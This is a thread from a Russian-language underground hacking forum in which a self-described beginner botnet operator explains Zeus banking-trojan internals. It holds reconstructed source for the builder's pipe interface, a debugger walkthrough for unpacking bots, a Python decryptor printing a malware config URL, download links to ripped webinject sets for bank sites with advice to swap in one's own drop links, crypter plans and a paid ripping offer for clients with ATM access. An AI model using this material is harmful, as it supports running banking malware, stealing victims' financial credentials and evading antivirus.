• XSS.stack #1 – первый литературный журнал от юзеров форума

Откровение зевса? :)

Отслеживать

KraZz

(L3) cache
Пользователь
Регистрация
18.06.2009
Сообщения
196
Реакции
7
Я знаю, что многие любят придумывать что-то свое и что самое интересное, что начинают потом в ЭТО, свято верить.
Надеюсь все отнесутся к написанному с юмором %))) И да, пишу все это естественно на правах нуба :)
Может где уже up этом и писали в привате или на форумах под хайдами, короче.. похер нах, здесь все честно а сталобыть и истена

начнем по традиции с жертвы, сцылко
http://demonteam.narod.ru/download/zsb.rar
PASS: 666
что есмь такое, а все очень просто - это часть билдера зевса %))) его полный функционал на вкладке Information
сегодня мы раскроем тайны пайпа.. ВЫ не знает что это такое? – читайте RTFM в MSDN, хотя я и сам в этой теме "не шарю" %)))
мы увидим часть "исходного" кода и попытаемся понять, что это за такое и нах оно нам нужно
и так, начнем атаку на клоунов. начать, пожалуй, советую смеха ради, да и забавы тоже с ЛК и их чудо киллера
http://www.kaspersky.ru/support/viruses/so...e&qid=208636281
сие "Чудо" убивает потенциальную тачку наглухо(теоретически), а сталобыть бот "стучаццо" больше не будет
5 марта с утречка после пива они его создали, ~месяц на кодинг, месяца 2 они его ловили, еще раньше где-то о нем слышали
А статейку застрочили только через полгода, когда басня про ZBot стала не актуальна
В итоге: всех-нах-победиле %))

Ну вот, бредисловие вступительное было, а теперь и к самой сути:
Автор зевса создал интерфейс(IPipe :)) на основе пайпов для общения билдера с ботом
Бот - это "сервер"
Билдер - это "клиент"
Information как раз функу IPipe и юзает для отображения инфы о боте и его удаления в "тест-режиме"
Код интерфейса пайпа
Код: 
#define  PIPE_PREFIX L"\\\\.\\pipe\\"
#define  PIPE_NAME L"_AVIRA_2109"

LPVOID HeapAlloc(size_t dwByte)
{
	return ::HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwByte+4);
}// end « HeapAlloc » 

void HeapFree(LPVOID lpMem)
{
	if(lpMem) ::HeapFree(hHeap, NULL, lpMem);
}// end « HeapFree »

/**
* Parameter: cmd
* 0x01 - VersionBot
* 0x02 - NameBot
* 0x03 - RemoveBot
* 0x04 - CurrentProcessIdLoader
* 0x05 - [...]
* 0x06 - [...]
* 0x07 - [...]
* 0x08 - [...]
* 0x09 - [...]
* 0x0A - [...]
* 0x0B - PathLoader
* 0x0C - PathConfig
* 0x0D - PathLog
* 0x0E - %)))
*/
DWORD IPipe(DWORD cmd, LPDWORD data, LPDWORD size)
{
	HANDLE hPipe;  
	LPVOID Buffer;
	DWORD ret = -1;
	WCHAR PipeName[sizeof PIPE_PREFIX+sizeof PIPE_NAME];
	lstrcpyW(PipeName, PIPE_PREFIX);
	lstrcpyW(PipeName+sizeof PIPE_PREFIX/2-1, PIPE_NAME);
	bool skip=1;
	while(TRUE)
	{
  hPipe = CreateFileW(PipeName, GENERIC_READ|GENERIC_WRITE, 
  	FILE_SHARE_WRITE|FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
  if(hPipe != INVALID_HANDLE_VALUE) break; 
  if(!skip) return ret;
  WaitNamedPipeW(PipeName, NMPWAIT_WAIT_FOREVER); 
  skip=0;
	}
	DWORD r = PIPE_READMODE_MESSAGE;
	DWORD sz = 0;
	if(SetNamedPipeHandleState(hPipe, &r, NULL, NULL) 
  && WriteFile(hPipe, &cmd, 4, &r, 0)
  && WriteFile(hPipe, &sz, 4, &r, 0)
  && WriteFile(hPipe, NULL, sz, &r, 0)
  && ReadFile(hPipe, &ret, 4, &r, 0) && r == 4)
	{
  sz=0;
  if(ReadFile(hPipe, &sz, 4, &r, 0) && r == 4)
  {
  	if(sz > 0)
  	{
    Buffer = HeapAlloc(sz);
    if(Buffer && ReadFile(hPipe, Buffer, sz, &r, 0) && sz == r) 
    {
    	if(data && size)
    	{
      *data = (DWORD)Buffer;
      *size = sz;
    	}
    	else
    	{
      HeapFree(Buffer);
    	}
    }
    else
    {
    	ret = -1;
    	HeapFree(Buffer);
    }
  	}
  }
  else
  {
  	ret = -1;
  }
	}
	CloseHandle(hPipe); 
	return ret;
}// end « IPipe »
Параметр cmd - команда посланная боту
Команда 0x01(VersionBot) возвращает dword версии бота, которая жестко вшивается как константа в бота
и то, что мы видим в окне "Spyware status on this system"
Example: Version: 1.1.1.1

Команда 0x02(NameBot) возвращает строку с именем бота которую, пишем в конфиге(config.txt)
entry "StaticConfig"
botnet "ZBot"
end
то, что мы видим в окне "Spyware status on this system"
Example: Botnet: ZBot или Botnet: -- default –

Команда 0x03(RemoveBot) деинициализирует бот + происходит киляние файлов sdra64.exe, local.ds, user.ds
Эти действия происходят при нажатии на кнопку "Remove spyware from this system"

Команды 0x0B, 0x0C и 0x0D возвращают строки с путями и именами файлов sdra64.exe, local.ds, user.ds
то, что мы видим в окне "Spyware status on this system"
Example:
Loader: C:\WINDOWS\system32\sdra64.exe
Config: C:\WINDOWS\system32\lowsec\local.ds
Log: C:\WINDOWS\system32\lowsec\user.ds

ЗЫ: хз. может потом, еще че-нить из "исходников" сюда выложу..
 
ну и что?
Зевс здесь чич-то случайной жертвой стал, из-за бренда!(посещаемость у таких тем немного выше)

Топег для адекватных заказчиков на заказы рипа
Просто обычно тупо пишут, сделаю то-то и аська или заказчик - есть работа, аська и стучись узнавай че там да каг, му-ха-ха
У мну другой подход к таким вещам
Исходный код - это результат моего(нашего) рипа
То, что внизу - это документация к рипнутому коду!
В архиве скомпилированный вариант рипнутого кода
Любой может взять билдер зевса и сравнить каждый байт с рипнутой версией и попробовать найти 10 отличий..(из рипнутого функционала)
А заказчик, который платит от 5к зеленых и имеет физический доступ к ATM, умеет это делать очень хорошо %)))
Заказчики бывают разные, к примеру, с AV-контор реверснуть животное с уровнем сложности VMProtect`а
Заказчики, заказывающие рип засранчиков на предмет рипа каких-то финч(хуков к примеру из драйверов), чтобы потом юзать в своих зверьках, могут сэкономить не 1к зелени - ИМХО
Все это естественно приватно и НИЧЕГО НЕ ПЕРЕДАЕТСЯ НИКОМУ, даже за большие деньги
А обещание запостить еще "КОД С ДОКУМЕНТАЦИЕЙ" – это просто UP темы будет
Некоторые просто пишут UP etc.. я такое себе редко могу позволить.. потому, что ненавижу посты с двумя словами..
Лутше бы положил сорц того как зевс хукает осла и разжевал че к чему
Инфу про хуки выкладывать нет желания(если бы хотел – запостил бы в общую тему для зевса), могут заюзать тролли, из-за чего станут полицца(90%) всего того что шевелится и движется(прежде чем что-то делать нужно подумать о последствиях)
Для этого и существует ограничение на инфу в привате или за бабло, именно из-за этого и не выкладывают многие(ИМХО), да и здесь где-то уже ап этом писали ;)
«единственная причина которая мне не дала выложить в паблик это будут юзать его все кому не лень и кому не надо» ©Одинокий Волк
ЗЫ: Те, кто знает, о чем здесь написано, обычно просто тихо стучаццо в ПМ ;)
ЗЫЫ: UPать ведь можно много раз %))) было бы желание, МОТИВАЦИЯ и время ;)
 
Тема немного ламерская получилась.. но, да ладно :)
Когда-то давно во времена рождения зевса(1.1.1.0), была создана тулуза
http://blog.threatexpert.com/2008/12/zeus-...-decryptor.html - DecodeZeusConfig
ЗЫ: RSS http://www.threatexpert.com/latest_threat_reports.aspx
ЗЫЫ: сайтег бывает находицца в дауне

Прошло какое-то время, и появилась новая версия билдера, где уже парсер конфигов(DecodeZeusConfig) не работал
Но еще в сырцах веба, автор написал:
«Поздравляю мега хакеров, этот алгоритм позволит вам спокойно читать данные бота. Не забудьте написать 18 парсеров и 100 бэкдоров»
Ну эт он просто понял что бесполезно быть велосипедистом..
Варнинг: Это просто тупо пример - как аверы могут получить "содержимое" чужих конфигов

Теперь к самой сути. Здесь я попытаюсь объяснить, как находить RC4 key в самом боте и как декриптовать ссылки url_config, url_compip
История алго RC4 такова, что он тоже когда-то был рипнут %)))
Основное что нам будет нужно это сам бот(exe-файл), найти их можно здесь
http://www.malwaredomainlist.com/mdl.php
боты могу быть и криптованые, здесь о таких писать ничего не буду, скажу лишь только, что снимаются крипторы такие очень легко
но есть попадаюцца шедевры, которые перемещают данные и морфят сам код, чтобы убить проакт.. итд. но это очень редко
обычно много крипторов делаецца ради "наколоти бабло с ламеров" и "лижбы как-нибудь не полился"

перед тем как скачивать чужого бота, советую потренироваться на своих и сбилдить их разными версиями
это нужно чтобы "зрительно запомнить", как распаковывается сам бот, и это я сейчас объясню как-нибудь
Начало - тут все просто(здесь подразумеваецца что вы знакомы с http://www.wasm.ru/series.php?sid=17 (ЗЫЫЫ: в разделе реверса, без этих минимальных знаний делать нех!))
запускаем бота в оле(ollydbg) и стоя на EP(ModuleEntryPoint)
скролим код вниз до JMP EDX
Код: 
0040670E     31F6            XOR ESI,ESI
00406710     E8 09000000     CALL 0040671E
00406715     8B3424          MOV ESI,DWORD PTR SS:[ESP]
00406718     83C4 04         ADD ESP,4
0040671B     C2 2000         RETN 20
0040671E     6A 0E           PUSH 0E
00406720     6A FF           PUSH -1
00406722     FF15 18104100   CALL DWORD PTR DS:[<&KERNEL32.SetMailslotInfo>]
00406728     B8 00000000     MOV EAX,0
0040672D     6A 00           PUSH 0
0040672F     6A 00           PUSH 0
00406731     6A 12           PUSH 12
00406733     6A 00           PUSH 0
00406735     FF15 58104100   CALL DWORD PTR DS:[<&KERNEL32.CreateMailslotW>]
0040673B     25 B8000000     AND EAX,0B8
00406740     01C6            ADD ESI,EAX
00406742     81FE 0F2EFC08   CMP ESI,8FC2E0F
00406748     7D 05           JGE SHORT 0040674F
0040674A     83F8 00         CMP EAX,0
0040674D     74 CF           JE SHORT 0040671E
0040674F     89C3            MOV EBX,EAX
00406751     B8 D4150100     MOV EAX,115D4
00406756     05 43030000     ADD EAX,343
0040675B     89D1            MOV ECX,EDX
0040675D     51              PUSH ECX
0040675E     6A 40           PUSH 40
00406760     68 00300000     PUSH 3000
00406765     50              PUSH EAX
00406766     83EC 04         SUB ESP,4
00406769     C70424 00000000 MOV DWORD PTR SS:[ESP],0
00406770     FF15 2C104100   CALL DWORD PTR DS:[<&KERNEL32.VirtualAlloc>]
00406776     59              POP ECX
00406777     89F1            MOV ECX,ESI
00406779     8B3424          MOV ESI,DWORD PTR SS:[ESP]
0040677C     89C7            MOV EDI,EAX
0040677E     81C6 DF000000   ADD ESI,0DF
00406784     50              PUSH EAX
00406785     B9 E2010000     MOV ECX,1E2
0040678A     BA 85F8B184     MOV EDX,84B1F885
0040678F     31ED            XOR EBP,EBP
00406791     30FF            XOR BH,BH
00406793     00D7            ADD BH,DL
00406795     023E            ADD BH,BYTE PTR DS:[ESI]
00406797     83C6 01         ADD ESI,1
0040679A     883F            MOV BYTE PTR DS:[EDI],BH
0040679C     001F            ADD BYTE PTR DS:[EDI],BL
0040679E     81C7 F5300600   ADD EDI,630F5
004067A4     81EF F4300600   SUB EDI,630F4
004067AA     52              PUSH EDX
004067AB     51              PUSH ECX
004067AC     6A 1D           PUSH 1D
004067AE     6A FF           PUSH -1
004067B0     FF15 18104100   CALL DWORD PTR DS:[<&KERNEL32.SetMailslotInfo>]
004067B6     59              POP ECX
004067B7     8B1424          MOV EDX,DWORD PTR SS:[ESP]
004067BA     83C4 04         ADD ESP,4
004067BD     05 B3940700     ADD EAX,794B3
004067C2     2D AF940700     SUB EAX,794AF
004067C7     C1EA 08         SHR EDX,8
004067CA     81C5 ADDC0000   ADD EBP,0DCAD
004067D0     81ED ACDC0000   SUB EBP,0DCAC
004067D6     39C5            CMP EBP,EAX
004067D8     75 09           JNZ SHORT 004067E3
004067DA     BD 85F8B184     MOV EBP,84B1F885
004067DF     89EA            MOV EDX,EBP
004067E1     31ED            XOR EBP,EBP
004067E3     83E9 01         SUB ECX,1
004067E6     83F9 00         CMP ECX,0
004067E9     75 A6           JNZ SHORT 00406791
004067EB     58              POP EAX
004067EC     89C2            MOV EDX,EAX
004067EE     83C2 04         ADD EDX,4
004067F1     FFE2            JMP EDX
004067F3     C3              RETN
вот такой примерно будет код, он может незначительно отличатся, но будет всегда ДЖАМП С РЕГИСТРОМ(JMP EDX)
ставим бряк(F2) по адресу 004067F1 и жмем F9 и F7
теперь повторяем тоже самое, скролим вниз до JMP EBX
Код: 
00870000     90              NOP
00870001     90              NOP
00870002     90              NOP
00870003     90              NOP
00870004     89E5            MOV EBP,ESP
00870006     83EC 14         SUB ESP,14
00870009     8B5D 00         MOV EBX,DWORD PTR SS:[EBP]
0087000C     83EB 07         SUB EBX,7
0087000F     BE 0E670000     MOV ESI,670E
00870014     29F3            SUB EBX,ESI
00870016     891C24          MOV DWORD PTR SS:[ESP],EBX
00870019     57              PUSH EDI
0087001A     BE 00100000     MOV ESI,1000
0087001F     01DE            ADD ESI,EBX
00870021     B9 0E570000     MOV ECX,570E
00870026     F3:A4           REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00870028     BE D6690000     MOV ESI,69D6
0087002D     01DE            ADD ESI,EBX
0087002F     B9 71A00000     MOV ECX,0A071
00870034     F3:A4           REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00870036     5F              POP EDI
00870037     BE 5B360000     MOV ESI,365B
0087003C     85F6            TEST ESI,ESI
0087003E     74 2A           JE SHORT 0087006A
00870040     BA 00000000     MOV EDX,0
00870045     01FA            ADD EDX,EDI
00870047     B8 5B360000     MOV EAX,365B
0087004C     01F8            ADD EAX,EDI
0087004E     89C7            MOV EDI,EAX
00870050     894424 04       MOV DWORD PTR SS:[ESP+4],EAX
00870054     BE 24C10000     MOV ESI,0C124
00870059     01C6            ADD ESI,EAX
0087005B     8038 00         CMP BYTE PTR DS:[EAX],0
0087005E     75 05           JNZ SHORT 00870065
00870060     8A0A            MOV CL,BYTE PTR DS:[EDX]
00870062     8808            MOV BYTE PTR DS:[EAX],CL
00870064     42              INC EDX
00870065     40              INC EAX
00870066     39C6            CMP ESI,EAX
00870068     75 F1           JNZ SHORT 0087005B
0087006A     E8 04000000     CALL 00870073
0087006F     BE 103CC55A     MOV ESI,5AC53C10
00870074     31C9            XOR ECX,ECX
00870076     8A2F            MOV CH,BYTE PTR DS:[EDI]
00870078     322A            XOR CH,BYTE PTR DS:[EDX]
0087007A     882F            MOV BYTE PTR DS:[EDI],CH
0087007C     FEC1            INC CL
0087007E     42              INC EDX
0087007F     80F9 04         CMP CL,4
00870082     75 05           JNZ SHORT 00870089
00870084     31C9            XOR ECX,ECX
00870086     83EA 04         SUB EDX,4
00870089     47              INC EDI
0087008A     39F8            CMP EAX,EDI
0087008C     75 E8           JNZ SHORT 00870076
0087008E     8B7424 04       MOV ESI,DWORD PTR SS:[ESP+4]
00870092     83C6 08         ADD ESI,8
00870095     E8 90000000     CALL 0087012A
0087009A     50              PUSH EAX
0087009B     54              PUSH ESP
0087009C     6A 40           PUSH 40
0087009E     FF77 50         PUSH DWORD PTR DS:[EDI+50]
008700A1     53              PUSH EBX
008700A2     FF93 F8100100   CALL DWORD PTR DS:[EBX+110F8]
008700A8     58              POP EAX
008700A9     89DF            MOV EDI,EBX
008700AB     53              PUSH EBX
008700AC     E8 81000000     CALL 00870132
008700B1     5B              POP EBX
008700B2     E8 73000000     CALL 0087012A
008700B7     897C24 08       MOV DWORD PTR SS:[ESP+8],EDI
008700BB     E8 72000000     CALL 00870132
008700C0     3B7C24 08       CMP EDI,DWORD PTR SS:[ESP+8]
008700C4     75 11           JNZ SHORT 008700D7
008700C6     83C7 78         ADD EDI,78
008700C9     C747 FC 1000000>MOV DWORD PTR DS:[EDI-4],10
008700D0     E8 5D000000     CALL 00870132
008700D5     EB 03           JMP SHORT 008700DA
008700D7     83C6 04         ADD ESI,4
008700DA     8B4424 08       MOV EAX,DWORD PTR SS:[ESP+8]
008700DE     B9 04000000     MOV ECX,4
008700E3     66:8948 06      MOV WORD PTR DS:[EAX+6],CX
008700E7     57              PUSH EDI
008700E8     E8 45000000     CALL 00870132
008700ED     59              POP ECX
008700EE     89F8            MOV EAX,EDI
008700F0     39C1            CMP ECX,EAX
008700F2     73 14           JNB SHORT 00870108
008700F4     8B79 0C         MOV EDI,DWORD PTR DS:[ECX+C]
008700F7     033C24          ADD EDI,DWORD PTR SS:[ESP]
008700FA     51              PUSH ECX
008700FB     50              PUSH EAX
008700FC     E8 31000000     CALL 00870132
00870101     58              POP EAX
00870102     59              POP ECX
00870103     83C1 28         ADD ECX,28
00870106     EB E8           JMP SHORT 008700F0
00870108     BB A35A0000     MOV EBX,5AA3
0087010D     8B4C24 08       MOV ECX,DWORD PTR SS:[ESP+8]
00870111     8959 28         MOV DWORD PTR DS:[ECX+28],EBX
00870114     031C24          ADD EBX,DWORD PTR SS:[ESP]
00870117     E8 C5000000     CALL 008701E1
0087011C     83C4 14         ADD ESP,14
0087011F     59              POP ECX
00870120     31C0            XOR EAX,EAX
00870122     89E5            MOV EBP,ESP
00870124     83C5 2C         ADD EBP,2C
00870127     FFE3            JMP EBX
00870129     C3              RETN
ставим бряк(F2) по адресу 00870127 и жмем F9
все мы распаковали данные в нужной нам секции
переходим туда
это окно дампа расположенное под окном дизасма и инфо
чтобы было понятно ПОСМОТРИТЕ РИСУНОК screen.gif( http://demonteam.narod.ru/download/screen.gif ), там показан формат данных с комментариями :)
в архиве я в фейк добавил "парсер конфигов" о нем ниже
по смещению(от начала секции) 0x2A находится RC4 key размером 258 байт(encryption_key), а сразу за ним зашифрованные ссылки url_config, url_compip
их можно сразу увидеть, они начинаются с сигнатуры(5E 7D 66 7D 28 40 19) сразу поле ДВУХ НУЛЕЙ

теперь я расскажу, как url_config, url_compip расшифровать
для расшифровки нам потребуется установленный питон на компе и вот собственно сам скрипт
Код: 
from binascii import *
#=========================
def encrypt(url):	
	data=""
	for iter, c in enumerate(url):
  if iter&1:
  	c=(iter*2+7+ord(c))&0xFF
  else:
  	c=(0xF6-iter*2+ord(c))&0xFF
  data+=chr(c)
	return b2a_hex(data)
#=========================
def decrypt(data):	
	data=a2b_hex(data)
	url=""
	for iter, db in enumerate(data):
  if iter&1:
  	db=(0xF9-iter*2+ord(db))&0xFF
  else:
  	db=(iter*2+10+ord(db))&0xFF
  url+=chr(db)
	return url
#=========================
data = "5E7D667D2840198C5D90108F47823B98458F46A42FA32F6329A7F1AC2EA62CA6E5B2E0B014B8"
data = decrypt(data)
print data
#=========================
data = "5E7D667D2840198C5D9010834D93479E3F9900903D9E"
data = decrypt(data)
print data
#=========================
Не забываем про ОТСТУПЫ в питоне, иначе скрипт работать не будет!
Запускаем его в IDLE и получаем
Код: 
IDLE 1.2      ==== No Subprocess ====
>>> 
http://www.riaasoftware.cn/opera/i.cfg
http://www.formyip.com
берем в оле выделяем криптованные ссылки и копируем бинарный код
и вставляем его в data = "" (между кавычек без пробелов)
тоже самое для второй ссылки
теперь качаем конфиг(http://www.riaasoftware.cn/opera/i.cfg ЗЫ: это просто пример %)))

P. S.
Позже(хз. когда :)), выложу вторую часть..
 
AHTOLLlKA
Ну фсе, открыл тайны Мадридского двора %)))
Если честно не видел(думаю что есть и те, кто кроме меня тоже ;)), но у него инфы там значительно больше..
Тут разница в том, что он как авер, а я как начинающий "ботовод" %)))
Гы-гы, че заметил у него секция DnsMap криво декриптуецца, скорее всего это баг зевса – надо будет потом посмотреть более тщательно этот код..
ЗЫ: теперь массово все начнут пиздить чужие инжекты и выкладывать в паблик %)))
 
Вообщем сегодня пил пиво и думал, думал.. и решил все-таки парсер не выкладывать в паблик
Но если будут попадаться жирные конфиги, то буду из них рипать webinjects.txt и здесь выкладывать
Если у кого-то есть грамотные идеи - добро пожаловать в личку, обсудим :)
ЗЫ: времени не так много, как хотелось бы!

В стандартных архивах с зевсом, когда происходит очередной "паблик релиз", находится webinjects.txt размером ~70kb
Вот линк на webinjects.txt размером 330kb(276 инжектов) рипнутый из конфига размером 170kb
http://demonteam.narod.ru/download/zinj1.rar
PASS: 666
А вообще не удивлюсь, если уже где-то выкладывали, но линки для общества юных ботоводов, только приветствуются ;)
ЗЫЫ: Парочка инжектов, там были просто пипец здоровых, считай что полноценные веб-странички, удалил их нах %)))
 
>> твой декриптор конфига комменты инжекта показывает?
Нет, потому что комменты в конфиг не билдяцца, более того там "все" инжекты сжимаются, потому что некоторые инжекты очень большие

>> зы.хотелось бы взглянуть на него, если не шибко секретный
Нет :) пусть будет приватным..

Инжекты чич-то для *.au (ЗЫ: не путать с .ua %)) часть удалил :)) ЗЫЫ: НЕ ЗАБЫВАЙТЕ линки на !свои! править %)))
http://demonteam.narod.ru/download/zinj2.rar
PASS: 666

В архив я добавил свой скрипт для вима и скриншот как это выглядит, может кому-то прикальнет такой диз :)
там подсветка, свертывание кода, подсчет инжектов итд..

скрипт надо скопировать в директорию c:\Program Files\vim\syntax\zeus.vim
в файле _vimrc из директории c:\Program Files\vim\
надо прописать
Код: 
" Добавляем в меню пункт, чтобы потом открыв в виме файл config.txt или webinjects.txt
" и  выбирав из меню->Syntax->ZeuS скрипт сделал всю грязную работу :)
amenu Syntax.ZeuS :so $VIM/syntax/zeus.vim<CR>
" Включаем нумерацию строк
set nu
" Устанавливаем шрифт
set guifont=Courier_New:h9:cRUSSIAN
" Включаем поле для свертывания кода при клике мыши
set foldcolumn=1
Но можно быстрее жмем клавиши zr и все инжекты разворачиваются на один уровень, потом еще раз итд..
жмем клавиши zm и все инжекты сворачиваются на один уровень, потом еще раз итд..
ставим курсор на webinjects.txt(в файле config.txt) жмем клавиши gf и в виме откроется webinjects.txt (файл webinjects.txt должен находится в одной директории с файлом config.txt)
короче в хелпе вима все это подробно расписано :)
 
Спасиб за месаджи приватные, не ожидал что темы будут интересны многим
Сорри что пропал на месяц, но не от меня все зависит..
у мну DL вообще пропал – не знаю, может это не только у одного меня были траблы
ну да хс заработал и ладно..
на счет писанины - по возможности будут типа мини статейки от меня, но скорее всего под хайдами(надо еще разобраться как их юзать %))),
есть причины..
сейчас я занят написанием нового криптора, планирую создать сервис("бесплатный"), то есть буду криптовать exe, тем, у кого мани для старта нет, идея засела после того как прочитал вот это:
http://rtfm.fsay.net/black/art2.html
Итак, приключения продолжаются. И затырк пошел следующий.Немогу закриптовать бота! И не смешно, кстати. Глофф куда-то пропал. Обратился к сталину - тот закриптовал (бесплатно. Я его просто попросил по человечески), НО убил функционал. 90% функций неработает. Бот умирает в памяти и снова появляется. Грузит проц на 80% и неработает. Судя по скорости крипта - он небыл ручным. Но обижаться неприходится. Человек попробовал. Потратил свое время. И на том огромное спасибо.Я своими кривыми ручонками добился некоторго крипта.
Много кто брался, но либо запарывали работоспособность, либо криптовали не очень качественно. Часть антивирусов орало! В итоге объявился Глофф и сделал все ручками. Бот после крипта весить 19 кб. Работоспособность сохранилась. Доволен! Теперь берусь за загрузки, трафик и т.д.
Планирую адский морф сделать, пермутацию, аб.. итд. (но хз со временем как получится)
Попался интересный криптор, сделаю обзор.. думаю, новичкам бкдет интересно.. там антидамп реализован, актуально для зевса может быть против проактивки AV..
Еще в планах статейку написать, как делать мод сплоита в связке на примере Элеоноры
Короче дахрена там чего еще есть..
 
Решил немного разрулить ситуацию
По поводу аськи - у мну ее нет, и врятли когда-то будет
Суть здесь проста, многие берут клиент и сразу тупо его юзают, ну и чтобы было юзабельно и диз симпотный был
У меня другой подход, я начинаю изучать протокол, который клиент юзает, потом самого клиента исходники или если нету в паблике ни того ни другого, то реверс(так даже интересней)
Меня это дырявое сито(про протокол) и его сервис и лольные выходки со стороны оффф.. полностью не устраивает
Тем более, когда есть альтернатива по всем параметрам имеющая аську, ну за исключением популярности..
И у меня просто ФИЗИЧЕСКИ ВРЕМЕНИ НЕТ на торч в аське или жабе
Это касается и тех, кто на другом форуме мессаджи пиcали

Winux: С администарцией связался человек, занимающийся официальной продажей и поддержкой продукта. Убедительная просьба на форуме не упоминать о продаже сабжа.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх